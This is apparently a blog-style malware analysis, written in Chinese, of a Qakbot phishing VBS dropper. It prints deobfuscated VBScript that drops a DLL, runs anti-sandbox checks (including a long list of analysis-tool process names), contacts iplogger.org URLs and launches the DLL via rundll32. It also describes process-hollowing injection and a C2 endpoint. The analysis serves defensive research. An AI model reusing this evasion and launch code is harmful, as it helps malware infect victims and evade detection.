QBOT分析报告
基本信息
| 样本名称 | qakbot |
|---|---|
| 样本类型 | vbs |
| 恶意类型 | 蠕虫远控 |
| 样本MD5 | 2a4a6cc8bd52f618a0190a8529c82b7d |
| 样本SHA1 | ef3d638377e245d7f388b41aad5e3525a8ccd2ed |
主要执行流程
样本是一封钓鱼邮件,下载文件是一个VBS文件,VBS开启了严重的混淆,进行了一系列反沙箱行为后,启动生成的DLL,DLL在内存中生成一个.exe文件,将其注入至miscexe进程中,联网进行读取文件。
关键技术概览
反沙箱
- 判断内存物理总量是否小于1030MB
- 判断Downloads文件夹总数是否小于3
- 枚举进程,判断是否具有特定进程,并且判断进程数要求为大于28
- 判断处理器核心数是否小于3
- 逻辑磁盘总量要求大于60G
- 判断启动时间为10分钟以上
傀儡进程
注入misc.exe,启动傀儡进程
DLL
通过rundll32 thyme.eot,DllRegisterServer启动DLL,来隐藏恶意代码进程
详细分析
vbs分析
vbs利用了ExecuteGlobal函数执行代码,加上如下代码将执行的代码提取到新vbs中
Dim fso
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
Set f = fso.OpenTextFile("D:\output.txt", 2)
新vbs分析
Function hydrogen255()
Dim article
Set article = CreateObject("ADODB.Stream")
With article
.Type = 2
.Charset = "ISO-8859-1"
.Open()
For Each prey257 in Array(eqaWMR, dwFB, fjFbt, fIT, whKINJ, TaC, NsyyZR, Ntwq, Xdvh, PBu, Dpiwm, RxzYzl, jAmeAf, IXP, pdiwb, eEZl, ImRXLL, PzqW, dxWL, VMQP, RRo, qGX, HAtVxn, AQhm, yWHkF, foFa, dqyE, Xfh, EzW, MYli, tyox, ESRVHk, hdkiQ, Mna, ufORvE, cszG, CQK, tNvnb, ElNsSR, ODchr, NeCph, KHslE, ONb, zBY, uRLZ, GZWRVa, SFE, uyEm, gkOhIN, zVLoy, RgBt, TdYe, odHjWc, dbjW, DheWY, WrVA, qcVYsN, qUoN, KTgee, Wytm, JDrD, nFtmoW, BPSSs, QJjubF, ATrzK, ENM, yUnWdJ, WJS, Htbq, OGbeq, XwVq, iKbUM, ZKf, wJhl, nVvZF, tjmi, SaQEIc, niXKuA, rXuvQU, zbmjY, PTit, iYr, QIq, iOjx, Loyh, xloOKa, jMUhG, HHQiX, VIeDfb, pZpH, HqKAo, rksozE, ifTT, diCHiA, SmCtwH, NMgj, aGmi, piVn, Zitl, wCS, wYC, BcHEx, wispgF, NNI, ZffJb, ekHbas, pztE, jwts, niskIE, WXm, Tsp, doVUqC, zokAMp, NhHND, RTWPOZ, hWoR, ihyi, jhp, WjTP, MSGvy, bGbd, vhwKQ, EAC, jcHlT, MJcyYj, CqV, mzMH, GAzN, igYm, CoIJ, URDhD, LUSfhd, YUuu, wirfcW, JHzK, UJL, WfVxS, viSiv, vujCZF, GLWIC, EHr, JNFd, gavawi, miEwbk, WnCGQb, kwJZ, QyLE, whn, AThTk, tPb692, SQpaIU, Dwe, YfY, JLIgB, FsGhVd, Idh, SfQK, meLv, lRw, mMxORK, Vroe, iUbBM, hggtzV, aTqk, qfH, iDAr, QEvu, fDgy, MfYsPZ, tOT, kwASp, TuCq, skl, NGsw, expyAC, NFs, aVYc, UPc, ZcFb, rsaSx, eMzqM, ndz, GyLN, PvDMPT, mNo, VcBpB, YOwqMh, GCo, OqVb, xcSgtL, rqG, Qvv, dEf, aQPQpl, HWvr, jFq, AKofCd, mYjD, eanOwo, yOMvpZ, IvwRM, nGrGRF, PgkZqM, VFNyP, HZC, YBd, GExMYL, dFBFW, utJ, HRq, GClkM, zYqaqA, ABR, mpgP, nhjjr, ysB, BBS, bpZoU, zJXsU, uVo, HUZUc, okt, NEfaC, DXrq, Vxh, vwC, rJIdmi, XPofC, yNIzb, rGqKTc, bHoVl, NqVrne, ObZQ, ZCfy, yhK, TMSF, Rfaf, QAf, JcYU, aLPCY, WYY, dUTCq, aydG, qSiDaE, akxtI, dhZE, mBeabd, dyafWP, APqI, uQS)
.WriteText determinate(prey257)
Next
.Position = 0
.SaveToFile octagon + "sprawl.zip", 2
.Close
End With
End Function
该函数创建了一个压缩包文件,其中有一个Dll
Function squelch653()
Set lNXmE = CreateObject("WScript.Shell")
hSJfbN = lNXmE.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\" + "138874814" + ".txt"
If WScript.CreateObject("Scripting.FileSystemObject").FileExists(hSJfbN) Then
gyxmXVefWxvzyile = 0
Else
gyxmXVefWxvzyile = 1
End If
squelch653 = gyxmXVefWxvzyile
End Function
Function embrace912()
on error resume next
If (InStr(WScript.ScriptName, cStr(138874814)) > 0 And squelch653 = 0) Then
Exit Function
End If
Set genuineService = GetObject("winmgmts:\\.\root\cimv2")
Set SchlitzlItems = genuineService.ExecQuery("Select * from Win32_ComputerSystem")
For Each yardage569 In SchlitzlItems
OSUTCvbIeRPyUp = OSUTCvbIeRPyUp + Int((yardage569.TotalPhysicalMemory) / 1048576
Next
If OSUTCvbIeRPyUp < 1030 Then
HxOPuqip
End If
End Function
判断138874814是否被下载,获取计算机物理内存总量判断是否小于1030MB
Function vhDzk()
If (InStr(WScript.ScriptName, "TESTING") > 0) Then
Exit Function
End If
raTrXQvHEJNbl("https://iplogger.org/1tRHp7")
Set genuineService = GetObject("winmgmts:Win32_Process")
genuineService.Create "rundll32" + " " + octagon + "thyme.eot" + ",DllRegisterServer"
Davidson
End Function
检查文件名称是否包含TESTING,下载文件开始启动生成的dll
rundll32 thyme.eot,DllRegisterServer
Function sywxVqpeDgv()
on error resume next
If (InStr(WScript.ScriptName, cStr(138874814)) > 0 And squelch653 = 0) Then
Exit Function
End If
abalone = 3
abalone_download = 3
HxOPuqip
End If
Set lNXmE = CreateObject("WScript.Shell")
hSJfbN = lNXmE.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\"
If CreateObject("Scripting.FileSystemObject").GetFolder(hSJfbN).Files.Count < abalone_download Then
HxOPuqip
End If
End Function
判断Downloads文件夹总数是否小于3
Function aspen()
on error resume next
If (InStr(WScript.ScriptName, cStr(138874814)) > 0 And squelch653 = 0) Then
Rutherford = Array("Munson vocate pathos weigh. 6853412 cattail cropland Olson woo, 9401202 Dianne lutanist, wellwisher liquid804 brink too bluejacket pithy conflict fluorine665 lettuce gold clay hideout dissipate energy592, 8047622 criteria shift hierarchal freeway132 Linus vagabond butternut. 4195194 goldfish folksy faze ")
Exit Function
REM admiration Phelps, protocol crump happy, cute voluble hyper ricotta clever713 apical Braille695 cheerleader gusset Britannic, sandstone vacuolate Bismark before riverfront77 tyke Nubia672 circular austenite aldehyde Canfield account saturater. pompadour telegram clamber tangy Baltimorean enthalpy assort rooftop, recital Wilshire laboratory Ibn. 1693647 Amoco. 2140279 dialectic datura
End If
slow = Array("cockpit, 5168151 mucus McClure Arturo Houdini Madsen guilt diffeomorphic Caesarian moire567 portland vee court677 colic, icosahedral portent quonset733 inheritance ")
Schlitzproc = (19 - (20 - ((44 + (-21.0)) + (-22.0))))
RmGBQ = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","winalysis.exe","emul.exe","malmon.exe","RepUtils32.exe","winapioverride32.exe","ethereal.exe","mbarun.exe","RepUx.exe","windbg.exe","ettercap.exe","mdpmon.exe","runsample.exe","windump.exe","fakehttpserver.exe","mmr.exe","samp1e.exe","winspy.exe","fakeserver.exe","mmr.exe","sample.exe","wireshark.exe","Fiddler.exe","multipot.exe","sandboxiecrypto.exe","XXX.exe","filemon.exe","netsniffer.exe","sandboxiedcomlaunch.exe")
Set genuineService = GetObject("winmgmts:\\.\root\cimv2")
Set SchlitzlItems = genuineService.ExecQuery("Select * from Win32_Process")
For Each yardage569 In SchlitzlItems
Schlitzproc = Schlitzproc + 1
For Each lull In RmGBQ
If yardage569.Name = lull Then
HxOPuqip
End If
congest = Array("ash logistic point mice. Cooley279 terrific backlash Cayley diabolic academia. 4015680 ")
Next
Next
If (Schlitzproc < 28) Then
HxOPuqip
End If
End Function
枚举进程,判断是否有如上所示进程,并且判断进程数要求为大于28
Function oVsalcUXqH()
on error resume next
idiocy = Array("padlock dispense nude writeup isotope hurdle NNE manifold Alhambra bathrobe ")
If (InStr(WScript.ScriptName, cStr(138874814)) > 0 And squelch653 = 0) Then
Exit Function
End If
qjuTaToPfH = 19
if (qjuTaToPfH >10) Then
Lois = Array(203, 131, 134, 244, 113)
Dim lNXmE:Set lNXmE = CreateObject("WScript.Shell")
iJlspJLIUDzfkec = lNXmE.RegRead("HKEY_CURRENT_USER\Control Panel\International\Geo\Nation")
For Each blaggqaWLasno In Lois
If (blaggqaWLasno = Cint(iJlspJLIUDzfkec)) Then
raTrXQvHEJNbl("https://iplogger.org/1ys2w7")
Davidson
Magellanic
WScript.Quit
End If
Next
End if
End Function
查询地区为俄国,北朝鲜,韩国,印度,美国。则不进行攻击
Function lXKrbqmJL()
Thimbu = Array("Bryn pituitary BEMA lamentation centerline initiate929. sever airframe. 4639378 atrocity Achaean handiwork indefinite emeritus land385 memo will leach527 Crawford littermate Brownell bootleg omicron McCluskey Britain uptrend incorrect Arapaho fluorspar gratuity genetic Wyatt hare giant ignominious526 digit minefield ")
on error resume next
If (InStr(WScript.ScriptName, cStr(138874814)) > 0 And squelch653 = 0) Then
Exit Function
End If
Set genuineService = GetObject("winmgmts:\\.\root\cimv2")
Set SchlitzlItems = genuineService.ExecQuery("Select * from Win32_Processor", , ((13 + (45 + 476.0)) - (80 + 406.0)))
For Each yardage569 In SchlitzlItems
If yardage569.NumberOfCores < 3 Then
js = True
End If
Next
If js Then
HxOPuqip
End If
End Function
判断处理器核心数是否小于3
Function cancelling()
on error resume next
If (InStr(WScript.ScriptName, cStr(138874814)) > 0 And squelch653 = 0) Then
Exit Function
End If
Set genuineService = GetObject("winmgmts:\\.\root\cimv2")
Set SchlitzlItems = genuineService.ExecQuery("Select * from Win32_LogicalDisk")
For Each yardage569 In SchlitzlItems
OSUTCvbIeRPyUp = OSUTCvbIeRPyUp + Int(yardage569.Size / 1073741824
Next
If OSUTCvbIeRPyUp < ((1346 - (17 + 1261.0)) - (35 + (-27.0))) Then
HxOPuqip
End If
gazette = Array("wholesome paratroop, sweat glibly854 youll524 coop487 haggle Burton impractical sorrowful rangy Bradshaw titanate discrepant Willa threesome curse. coax inadvertent. motet42 fanciful Zeiss gangling Toby hast Seattle gazelle ")
End Function
判断逻辑磁盘总量要求大于60G
Function nobody()
on error resume next
If (InStr(WScript.ScriptName, cStr(138874814)) > 0 And squelch653 = 0) Then
Exit Function
End If
set genuine = GetObject("winmgmts:\\.\root\cimv2")
set SchlitzlOS = genuine.InstancesOf("Win32_OperatingSystem")
for each pETHE in SchlitzlOS
Greek = pETHE.LastBootUpTime
epitaph = Mid(Greek,1,4) & "-" & Mid(Greek,5,2) & "-" & Mid(Greek,7,2) & " " & Mid(Greek,9,2) & ":" & Mid(Greek,11,2) & ":" & Mid(Greek,13,2)
yILnUa = abs(datediff("s",epitaph,now))
vExpzOWrRRxABd = yILnUa \ 60
ATGUDnudZJB = vExpzOWrRRxABd \ 60
vExpzOWrRRxABd = vExpzOWrRRxABd mod 60
bYcZzT = bYcZzT mod 60
If (ATGUDnudZJB = 0 And vExpzOWrRRxABd < 10) Then
HxOPuqip
End If
next
End Function
判断启动时间为10分钟以上
Function courtyard461()
Dim nykqLizQPRqffvA: Set nykqLizQPRqffvA = CreateObject("WScript.Shell")
Dim indescribable: Set indescribable = CreateObject("Scripting.FileSystemObject")
If (indescribable.FileExists(octagon + "microsoft.url")) Then
Magellanic
WScript.Quit
Else
With nykqLizQPRqffvA.createShortcut(octagon + "adobe.url")
.TargetPath = "https://adobe.com"
.Save()
End With
End If
End Function
判断是否存在文件microsoft.url,如果存在则退出。如果没有的话则创建adobe.url
DLL分析
生成了一个新exe,并在内存中加载运行,不过提取出来发现单独运行不了
新exe
挂起miscexe
写入远线程内存,起始地址为0x70000
再次远线程写入,起始地址为0xb0000
GetThreadContext
SetThreadContext设置起始地址
ResumeThread//0x419a3a
傀儡进程
查询获取注册表项
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
InstallDate,DigitalProductid
创建文件夹
“C:\Users\Administrator\AppData\Roaming\Mogi”
“C:\Users\Administrator\AppData\Roaming\Noov”
“C:\Users\Administrator\AppData\Roaming\Iqbe”
“C:\Users\Administrator\AppData\Roaming\Soyk”
“C:\Users\Administrator\AppData\Roaming\bydyac”
打开注册表键值RegCreateKeyExw
打开文件
网络连接利用了https协议
pecketil.org
发送post请求HttpOpenRequest()
其中dwflags选项为
GOPHER_TYPE_PDF
InternetCrackUrlA中参数为https://pecketil.org/sound.php
发现了一系列URL
模拟了一下该URL,发现读取了模拟的文件
参考资料
https://www.codenong.com/cs106361524/
扫一扫
1582
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
